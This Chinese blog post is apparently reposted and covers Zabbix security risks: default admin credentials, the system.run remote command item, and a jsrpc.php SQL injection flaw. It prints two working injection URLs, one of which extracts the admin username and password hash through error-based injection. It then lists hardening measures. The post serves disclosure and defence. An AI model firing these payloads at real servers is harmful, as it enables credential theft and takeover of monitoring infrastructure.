zabbix系列之安全

Posted cslj2013

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了zabbix系列之安全相关的知识,希望对你有一定的参考价值。

https://blog.csdn.net/xiaoyu_0217/article/details/73500125

存在问题:

1)zabbixAdmin口令太弱或使用默认口令(Admin/zabbix),被攻击后导致zabbix服务器暴露,攻击者可创建”system.run[command,<mode>]”监控项执行命令,甚至获取服务器shell,获取root权限。

说明:system.run[command,<mode>]命令是agent自带的,使zabbix server可远程在agent机器上执行任意命令,如果为了方便把agent启动用户设置为root的话(AllowRoot=1)非常危险。

2)最近爆出的zabbix漏洞,在url路径(http://****/zabbi/)后加以下代码

/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

输出结果如下则表示存在漏洞:

 

http://www.freebuf.com/vuls/112197.html

以上为仅为漏洞验证测试方式,攻击者可以通过进一步构造语句进行错误型sql注射,无需获取和破解加密的管理员密码.漏洞具体利用

https://zhuanlan.zhihu.com/p/22082375

https://www.cnblogs.com/s0ky1xd/p/5874043.html

 

漏洞详细说明:https://www.seebug.org/vuldb/ssvid-92302

 

措施:

1、很重要的一点,zabbix的登录口令一定要复杂,不要用默认口令或弱口令。

2zabbixserveragent都不要以root启动,不要设置AllowRoot=1

3、禁止agent执行system.run,不要设置EnableRemoteCommands=1

4、经常打安全补丁,如果系统内核版本过低有漏洞的话,即使在zabbix用户下照样能获取root权限。

5.不要使用默认的 admin ,修改成其他的,guest登录也取消吧补丁也打打吧

 

其他参考:

http://www.cnblogs.com/skyflask/p/7499925.html

 

以上是关于zabbix系列之安全的主要内容,如果未能解决你的问题,请参考以下文章

zabbix系列之四——快速使用

zabbix系列之三——安装报错

zabbix系列之监控类型及方式

zabbix系列之邮件告警

centos6.4下Zabbix系列之Zabbix安装搭建及汉化

zabbix系列之使用ansible批量部署zabbix客户端